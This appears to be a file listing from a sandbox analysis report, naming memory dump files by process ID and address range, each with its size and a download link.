memory/1116-121-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/1124-124-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/1124-123-0x000001E7C1C90000-0x000001E7C1CB7000-memory.dmp

Filesize
156KB

Download
memory/1132-126-0x0000023807960000-0x0000023807987000-memory.dmp

Filesize
156KB

Download
memory/1132-127-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/1216-131-0x0000022258140000-0x0000022258167000-memory.dmp

Filesize
156KB

Download
memory/1216-132-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/1256-135-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/1256-134-0x0000021684160000-0x0000021684187000-memory.dmp

Filesize
156KB

Download
memory/1304-146-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/1304-145-0x00000214E6730000-0x00000214E6757000-memory.dmp

Filesize
156KB

Download
memory/1344-149-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/1344-148-0x000001EFCA090000-0x000001EFCA0B7000-memory.dmp

Filesize
156KB

Download
memory/1396-151-0x000002B3DBDC0000-0x000002B3DBDE7000-memory.dmp

Filesize
156KB

Download
memory/1396-152-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/2204-32-0x00000196F2520000-0x00000196F273C000-memory.dmp

Filesize
2.1MB

Download
memory/3252-69-0x00007FF6BC6F0000-0x00007FF6BFFA5000-memory.dmp

Filesize
56.7MB

Download
memory/4156-61-0x00000294EFA10000-0x00000294EFA18000-memory.dmp

Filesize
32KB

Download
memory/4364-439-0x00000254E23D0000-0x00000254E23D6000-memory.dmp

Filesize
24KB

Download
memory/4364-436-0x00000254E2390000-0x00000254E239A000-memory.dmp

Filesize
40KB

Download
memory/4364-440-0x00000254E23E0000-0x00000254E23EA000-memory.dmp

Filesize
40KB

Download
memory/4364-438-0x00000254E23A0000-0x00000254E23A8000-memory.dmp

Filesize
32KB

Download
memory/4364-437-0x00000254E23F0000-0x00000254E240A000-memory.dmp

Filesize
104KB

Download
memory/4364-432-0x00000254E2160000-0x00000254E217C000-memory.dmp

Filesize
112KB

Download
memory/4364-433-0x00000254E2180000-0x00000254E2235000-memory.dmp

Filesize
724KB

Download
memory/4364-434-0x00000254E2240000-0x00000254E224A000-memory.dmp

Filesize
40KB

Download
memory/4364-435-0x00000254E23B0000-0x00000254E23CC000-memory.dmp

Filesize
112KB

Download
memory/4832-0-0x00007FF9E60B3000-0x00007FF9E60B5000-memory.dmp

Filesize
8KB

Download
memory/4832-15-0x00007FF9E60B0000-0x00007FF9E6B71000-memory.dmp

Filesize
10.8MB

Download
memory/4832-19-0x00007FF9E60B0000-0x00007FF9E6B71000-memory.dmp

Filesize
10.8MB

Download
memory/4832-13-0x00007FF9E60B0000-0x00007FF9E6B71000-memory.dmp

Filesize
10.8MB

Download
memory/4832-12-0x000001666DED0000-0x000001666DEF2000-memory.dmp

Filesize
136KB

Download
memory/5048-82-0x00007FFA042D0000-0x00007FFA044C5000-memory.dmp

Filesize
2.0MB

Download
memory/5048-83-0x00007FFA03EB0000-0x00007FFA03F6E000-memory.dmp

Filesize
760KB

Download